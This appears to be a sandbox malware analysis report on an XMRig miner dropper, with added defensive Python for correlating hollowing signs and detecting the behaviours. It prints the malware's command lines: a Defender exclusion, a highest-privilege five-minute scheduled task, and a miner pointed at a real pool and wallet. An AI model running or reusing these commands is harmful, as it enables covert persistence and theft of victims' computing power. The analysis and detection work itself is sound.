Resubmissions
  06/03/2024, 22:46   240306-2pzx2abc39   score 7
  23/12/2022, 20:25   221223-y7mhwahb34   score 10
  23/12/2022, 20:11   221223-yx8ncscc9x   score 10
  23/12/2022, 20:03   221223-ys7v9sha97   score 10

Analysis
  max time kernel: 600s
  max time network: 552s
  platform: windows10-2004_x64
  resource: win10v2004-20221111-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 23/12/2022, 20:25
Static task: static1
Behavioral task: behavioral1
  Sample: 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
  Resource: win7-20221111-en
  Note: the Analysis block above describes a windows10-2004_x64 run, and every memory IoC below is tagged behavioral2/ with PIDs that match the process tree, so the signatures and tree on this page come from that Windows 10 run rather than from this Windows 7 task.
General
  Target: 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
  Size: 2.1MB
  MD5: 55a350a007f6943a7e09f4abfdfa6979
  SHA1: c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef
  SHA256: 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80
  SHA512: 707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16
  SSDEEP: 49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz
Malware Config
Signatures
XMRig Miner payload (6 IoCs)
  resource                                                                       yara_rule
  behavioral2/memory/1456-160-0x0000000140000000-0x00000001407C9000-memory.dmp   xmrig
  behavioral2/memory/1456-161-0x0000000140343234-mapping.dmp                     xmrig
  behavioral2/memory/1456-162-0x0000000140000000-0x00000001407C9000-memory.dmp   xmrig
  behavioral2/memory/1456-163-0x0000000140000000-0x00000001407C9000-memory.dmp   xmrig
  behavioral2/memory/1456-165-0x0000000140000000-0x00000001407C9000-memory.dmp   xmrig
  behavioral2/memory/1456-170-0x0000000140000000-0x00000001407C9000-memory.dmp   xmrig
  All six hits are in PID 1456, the vbc.exe instance in the process tree below, in a region that starts at 0x140000000, the default image base of a 64-bit PE; the miner image, not the compiler, is what is mapped there.
Executes dropped EXE (2 IoCs)
  pid    Process
  3944   HMHM.exe
  2492   HMHM.exe
Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  description         ioc                                                                                               Process
  Key value queried   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation   896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation   HMHM.exe
  Both the sample and the dropped HMHM.exe perform the same lookup and, in the process tree below, spawn the same PowerShell and schtasks children, consistent with HMHM.exe being a copy of the dropper.
Uses the VBS compiler for execution (1 TTPs)
  Refers to vbc.exe, the Visual Basic .NET compiler; PID 1456 in the process tree is that binary carrying the XMRig command line.
Drops file in System32 directory (11 IoCs)
  description                   ioc                                                                                          Process
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx             svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log          svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs     svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm      svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat      svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk             svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp             svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log             svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs     svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk             svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat      svchost.exe
  All eleven entries are written by svchost.exe (PID 3068, the DsSvc service host in the process tree) under the SYSTEM profile's DataSharing storage; none is attributed to the sample or to HMHM.exe, so this signature is background noise for this report.
Suspicious use of SetThreadContext (1 IoCs)
  description             pid    Process                                                                 procid_target
  PID 4596 set thread context of 1456    896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe   98
  The sample (4596) resets the thread context of 1456 (vbc.exe). Together with the fourteen WriteProcessMemory rows from 4596 to 1456 below and the six xmrig YARA hits in 1456's memory above, this is the sample hollowing a legitimate .NET compiler process and running XMRig inside it.
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  (Generic signature text; nothing else in this report points to ransomware, and the payload found in memory is an XMRig miner.)
Program crash (2 IoCs)
  pid    pid_target   Process        procid_target
  3324   4596         WerFault.exe   80
  4960   3944         WerFault.exe   109
Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid    Process
  1888   schtasks.exe
  3008   schtasks.exe
  Both instances create the same task: "HMHM", every 5 minutes (/sc MINUTE /mo 5) at the highest run level, executing C:\ProgramData\edge\HMHM.exe. In both parents the task creation follows a PowerShell call that excludes C:\ProgramData from Defender scanning, so the task target sits in an excluded directory.
Modifies registry class (2 IoCs)
  description   ioc                                                                                  Process
  Key created   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings   mspaint.exe
  Key created   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings   mspaint.exe
Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid    Process
  4608   powershell.exe
  4608   powershell.exe
  4596   896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
  4472   mspaint.exe
  4472   mspaint.exe
  5096   mspaint.exe
  5096   mspaint.exe
  3944   HMHM.exe
  3972   powershell.exe
  3972   powershell.exe
Suspicious behavior: LoadsDriver (1 IoCs)
  pid    Process
  656    Process not Found
Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description                   pid    Process
  Token: SeDebugPrivilege       4596   896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
  Token: SeDebugPrivilege       4608   powershell.exe
  Token: SeLockMemoryPrivilege  1456   vbc.exe
  Token: SeLockMemoryPrivilege  1456   vbc.exe
  Token: SeDebugPrivilege       3944   HMHM.exe
  Token: SeDebugPrivilege       3972   powershell.exe
  SeLockMemoryPrivilege, requested twice by the hollowed vbc.exe (1456), is the privilege XMRig enables to back its scratchpad with large pages; a compiler has no use for it. SeDebugPrivilege is taken by the sample, by HMHM.exe and by both PowerShell instances.
Suspicious use of FindShellTrayWindow (1 IoCs)
  pid    Process
  1456   vbc.exe
Suspicious use of SetWindowsHookEx (4 IoCs)
  pid    Process
  4472   mspaint.exe
  5096   mspaint.exe
  2128   OpenWith.exe
  3616   OpenWith.exe
Suspicious use of WriteProcessMemory (26 IoCs)
  The report lists one row per call; identical rows are grouped here with a count.
  PID    wrote to memory of   Process                                                                 procid_target   rows
  4596   4608                 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe   82              2
  4596   3312                 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe   93              2
  3312   1888                 cmd.exe                                                                 95              2
  4596   1456                 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe   98              14
  3944   3972                 HMHM.exe                                                                110             2
  3944   4956                 HMHM.exe                                                                112             2
  4956   3008                 cmd.exe                                                                 118             2
  Every ordinary child in this report shows two rows; the vbc.exe target (1456) shows fourteen, the same pair that appears in the SetThreadContext entry above.
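The three signature tables above (WriteProcessMemory, SetThreadContext and the xmrig memory hits) are easier to read once correlated: the parent that wrote into a child many times and reset its thread context, where that child then carries the miner YARA hit, is the hollowing pair. The Python below is an added example, not tria.ge's own code, that parses the report's flattened wording (rebuilt inline from the rows above; three of the six memory rows are included) and produces that verdict. The min_writes threshold of 4 is an assumption drawn from this one report, where ordinary children get two rows and the hollowed one fourteen.

```python
"""Correlate the report's WriteProcessMemory, SetThreadContext and memory-YARA rows."""
import re
from collections import Counter, defaultdict

SAMPLE = "896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"

# The 26 WriteProcessMemory rows, rebuilt in the report's own flattened wording from
# (src pid, dst pid, src image, procid_target, number of identical rows). Constructed
# from the table above, not copied from a live report.
_WRITE_ROWS = [(4596, 4608, SAMPLE, 82, 2), (4596, 3312, SAMPLE, 93, 2),
               (3312, 1888, "cmd.exe", 95, 2), (4596, 1456, SAMPLE, 98, 14),
               (3944, 3972, "HMHM.exe", 110, 2), (3944, 4956, "HMHM.exe", 112, 2),
               (4956, 3008, "cmd.exe", 118, 2)]
WRITE_TEXT = " ".join(f"PID {s} wrote to memory of {d} {s} {img} {t}"
                      for s, d, img, t, n in _WRITE_ROWS for _ in range(n))
CTX_TEXT = f"PID 4596 set thread context of 1456 4596 {SAMPLE} 98"
# Three of the six xmrig memory rows from the report (one mapping row, two region rows).
MEMORY_TEXT = ("behavioral2/memory/1456-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig "
               "behavioral2/memory/1456-161-0x0000000140343234-mapping.dmp xmrig "
               "behavioral2/memory/1456-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig")

WRITE_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) (\d+)")
CTX_RE = re.compile(r"PID (\d+) set thread context of (\d+) \d+ (\S+) (\d+)")
MEM_RE = re.compile(r"behavioral\d+/memory/(\d+)-\d+-0x([0-9A-Fa-f]+)"
                    r"(?:-0x([0-9A-Fa-f]+))?-(memory|mapping)\.dmp (\w+)")


def parse_writes(text):
    """(src pid, dst pid, src image, procid_target) per WriteProcessMemory row."""
    return [(int(s), int(d), img, int(t)) for s, d, img, t in WRITE_RE.findall(text)]


def parse_ctx(text):
    """(src pid, dst pid) per SetThreadContext row."""
    return [(int(s), int(d)) for s, d, _img, _t in CTX_RE.findall(text)]


def parse_memory(text):
    """One dict per YARA hit; mapping rows have no end address."""
    return [{"pid": int(pid), "start": int(start, 16), "end": int(end, 16) if end else None,
             "kind": kind, "rule": rule} for pid, start, end, kind, rule in MEM_RE.findall(text)]


def analyse(write_text, ctx_text, mem_text, min_writes=4):
    """Rebuild parent->child edges and flag (parent, child) pairs that look hollowed:
    many writes into the child plus a SetThreadContext on it, enriched with any YARA
    hit inside the child. min_writes=4 is an assumed threshold (see lead-in)."""
    writes = parse_writes(write_text)
    counts = Counter((s, d) for s, d, _, _ in writes)
    children, image_of = defaultdict(set), {}
    for s, d, img, _ in writes:
        children[s].add(d)
        image_of[s] = img
    ctx = set(parse_ctx(ctx_text))
    mem = parse_memory(mem_text)
    hollowed = []
    for (s, d), n in counts.items():
        if (s, d) not in ctx or n < min_writes:
            continue
        regions = [h for h in mem if h["pid"] == d and h["kind"] == "memory"]
        hollowed.append({"src": s, "dst": d, "src_image": image_of[s], "writes": n,
                         "yara": {h["rule"] for h in regions},
                         "image_base": min((h["start"] for h in regions), default=None),
                         "image_size": max((h["end"] - h["start"] for h in regions), default=None)})
    return {"write_rows": len(writes), "write_counts": dict(counts),
            "children": dict(children), "hollowed": hollowed}


if __name__ == "__main__":
    for h in analyse(WRITE_TEXT, CTX_TEXT, MEMORY_TEXT)["hollowed"]:
        print(f"{h['src_image']} ({h['src']}) hollowed PID {h['dst']}: {h['writes']} writes, "
              f"YARA {sorted(h['yara'])}, image at {h['image_base']:#x}, size {h['image_size']:#x}")
```

The region size it reports (0x7C9000) is the mapped XMRig image, which is why the YARA rule fires on every dump of that range; the mapping row at 0x140343234 is a single address inside the same image and is excluded from the size calculation.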
Processes

C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe  (PID 4596)
  command line: "C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  └─ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4608)
       command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
  └─ C:\Windows\System32\cmd.exe  (PID 3312)
       command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
       - Suspicious use of WriteProcessMemory
       └─ C:\Windows\system32\schtasks.exe  (PID 1888)
            command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
            - Creates scheduled task(s)
  └─ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe  (PID 1456)
       command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of FindShellTrayWindow
  └─ C:\Windows\system32\WerFault.exe  (PID 3324)
       command line: C:\Windows\system32\WerFault.exe -u -p 4596 -s 1632
       - Program crash

C:\Windows\System32\rundll32.exe  (PID 4252)
  command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\mspaint.exe  (PID 4472)
  command line: "C:\Windows\system32\mspaint.exe" "C:\ProgramData\screen.jpg" /ForceBootstrapPaint3D
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\svchost.exe  (PID 3068)
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
  - Drops file in System32 directory

C:\Windows\system32\OpenWith.exe  (PID 2128)
  command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\mspaint.exe  (PID 5096)
  command line: "C:\Windows\system32\mspaint.exe" "C:\ProgramData\screen.jpg" /ForceBootstrapPaint3D
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe  (PID 3616)
  command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\WerFault.exe  (PID 728)
  command line: C:\Windows\system32\WerFault.exe -pss -s 432 -p 4596 -ip 4596

C:\ProgramData\edge\HMHM.exe  (PID 3944)
  command line: C:\ProgramData\edge\HMHM.exe
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  └─ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3972)
       command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
  └─ C:\Windows\System32\cmd.exe  (PID 4956)
       command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
       - Suspicious use of WriteProcessMemory
       └─ C:\Windows\system32\schtasks.exe  (PID 3008)
            command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
            - Creates scheduled task(s)
  └─ C:\Windows\system32\WerFault.exe  (PID 4960)
       command line: C:\Windows\system32\WerFault.exe -u -p 3944 -s 1804
       - Program crash

C:\Windows\system32\WerFault.exe  (PID 3236)
  command line: C:\Windows\system32\WerFault.exe -pss -s 408 -p 3944 -ip 3944

C:\ProgramData\edge\HMHM.exe  (PID 2492)
  command line: C:\ProgramData\edge\HMHM.exe
  - Executes dropped EXE

Reading the tree: the dropper (4596) first excludes C:\ProgramData from Defender, then registers the every-5-minutes "HMHM" task pointing at C:\ProgramData\edge\HMHM.exe, then hollows vbc.exe with XMRig configured for xmr-eu1.nanopool.org:14433 over TLS (--tls --coin monero) and crashes (WerFault -p 4596). HMHM.exe (3944), launched from the task, repeats the Defender exclusion and the task creation and also crashes; a second HMHM.exe (2492) runs with no children recorded. The rundll32, mspaint, OpenWith and DsSvc svchost entries have no recorded parent and are not attributed to the sample.
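The process tree shows three behaviours worth alerting on independently of the miner binary itself: a Defender exclusion added from PowerShell, a scheduled task at the highest run level whose target lives in C:\ProgramData, and a .NET compiler binary started with a stratum pool, a wallet and a --coin argument. The Python below is an added example, not part of the report or of tria.ge, that runs those three checks over constructed process-creation events in a Sysmon Event ID 1-like shape. The three malicious command lines are copied from the tree above; the two benign rows are made up to show the rules staying quiet; the rule names, the user-writable path list and the .NET-tool list are my own choices, not anything the report defines.

```python
"""Three command-line detections for the behaviours in the process tree above."""
import re
from dataclasses import dataclass


@dataclass
class Alert:
    rule: str
    pid: int
    image: str
    detail: str


# Constructed telemetry in a Sysmon Event ID 1 (process creation) shape. The first three
# command lines are copied from the report; the last two are made-up benign rows.
SAMPLE_EVENTS = [
    {"pid": 4608, "ppid": 4596,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": '"powershell" -Command Add-MpPreference -ExclusionPath \'C:\\ProgramData\''},
    {"pid": 1888, "ppid": 3312,
     "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"'},
    {"pid": 1456, "ppid": 4596,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 "
                r"-u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero"},
    {"pid": 7001, "ppid": 7000, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks /query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"'},
    {"pid": 7002, "ppid": 7000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command Get-MpPreference"},
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# Monero addresses are base58 (no 0, O, I, l): 95 chars for standard/subaddresses, 106 for integrated.
WALLET_RE = re.compile(r"^[1-9A-HJ-NP-Za-km-z]{95,106}$")
POOL_RE = re.compile(r"^[A-Za-z0-9.-]+:\d{2,5}$")          # host:port as passed to -o
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")  # assumed list
DOTNET_TOOLS = {"vbc.exe", "csc.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}


def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments whole and unquoting them."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def switch_value(toks, name):
    """Value following a case-insensitive switch such as /tr or -o, else None."""
    low = [t.lower() for t in toks]
    name = name.lower()
    if name in low and low.index(name) + 1 < len(toks):
        return toks[low.index(name) + 1]
    return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_defender_exclusion(ev):
    """PowerShell adding any Defender exclusion (path, process or extension)."""
    low = ev["cmdline"].lower()
    if basename(ev["image"]) in ("powershell.exe", "pwsh.exe") and "add-mppreference" in low and "-exclusion" in low:
        return Alert("defender_exclusion", ev["pid"], ev["image"], ev["cmdline"])
    return None


def rule_schtasks_persistence(ev):
    """schtasks /create with highest run level or a target in a user-writable directory."""
    if basename(ev["image"]) != "schtasks.exe":
        return None
    toks = tokens(ev["cmdline"])
    if "/create" not in [t.lower() for t in toks]:
        return None
    target = switch_value(toks, "/tr") or ""
    highest = (switch_value(toks, "/rl") or "").lower() == "highest"
    from_user_dir = any(p in target.lower() for p in USER_WRITABLE)
    if highest or from_user_dir:
        return Alert("schtasks_persistence", ev["pid"], ev["image"],
                     f"task={switch_value(toks, '/tn')} target={target} "
                     f"schedule={switch_value(toks, '/sc')}/{switch_value(toks, '/mo')} highest={highest}")
    return None


def rule_miner_cmdline(ev):
    """XMRig-style arguments (-o pool:port plus a wallet-like -u or --coin) on any image."""
    toks = tokens(ev["cmdline"])
    pool = switch_value(toks, "-o") or ""
    wallet = switch_value(toks, "-u") or ""
    coin = (switch_value(toks, "--coin") or "").lower()
    wallet_like = bool(WALLET_RE.match(wallet))
    if POOL_RE.match(pool) and (wallet_like or coin):
        return Alert("xmrig_cmdline", ev["pid"], ev["image"],
                     f"pool={pool} coin={coin} wallet_like={wallet_like} "
                     f"hollowed_dotnet_tool={basename(ev['image']) in DOTNET_TOOLS}")
    return None


RULES = (rule_defender_exclusion, rule_schtasks_persistence, rule_miner_cmdline)


def scan(events):
    """Apply every rule to every event; returns alerts in event order."""
    return [a for ev in events for a in (r(ev) for r in RULES) if a is not None]


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} {basename(a.image)}: {a.detail}")
```

The miner rule deliberately keys on the argument shape rather than on the pool hostname, since the pool is the one thing an operator rotates freely; the hollowed_dotnet_tool flag is the extra signal that makes PID 1456 here an unambiguous hit, because vbc.exe never takes -o host:port.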
Network
MITRE ATT&CK Enterprise v6
Downloads

  Filesize: 643.0MB  (listed twice in the original report)
  MD5: 434dc352dd7d67447a7654f5e2f0b926
  SHA1: 81fb6b7124a975574ff3d04c9f526d1df2040108
  SHA256: 65135968c98b5eab524026e1d20bbe8c7f95be359f078004904daaf535d8b23a
  SHA512: 158e15191f49b153308b5a20c0ccefc1ce21e481569e2258338b5aa5baf1ec88438328666d34482301ed41f2ab6fa9bfaa249c9b8b5bd0365152ec9db0617a2d

  Filesize: 9.8MB
  MD5: 6ae02dd17c77c99b974b3910f0b38347
  SHA1: aba54e7b2c07b2424fe1f16f6668d5a919292877
  SHA256: d709d5274d388265c614f75419b89ca5e3f908209f26d62e48b9a0286772bee7
  SHA512: 726afa7204e33c85e81f1b7666d52c05e0f548fc57b70b1aa92d7f81d3b7d1da9e77086d23a36703e029c643743372df7bf75fe6779a21c89ec8422c30fc972d

  Filesize: 135KB
  MD5: a6ffd274cae002bfa277e631623bea7d
  SHA1: cd55f04ee3525b3f39a4db60cafea55ba1ac7421
  SHA256: 69b56ec351690b018e7431b8a45034e0398f8aea5d18b1cd5a9254af8d109594
  SHA512: 0eeebe2a3c1cff323633bc86e7e7965b533a28d7e6ddb165f58da7a39a509f7ec16e051b88ef2b248e75a6788810efa79f3ade403db7413a719e345abcae52c0

  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  Filesize: 944B
  MD5: bd5940f08d0be56e65e5f2aaf47c538e
  SHA1: d7e31b87866e5e383ab5499da64aba50f03e8443
  SHA256: 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
  SHA512: c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406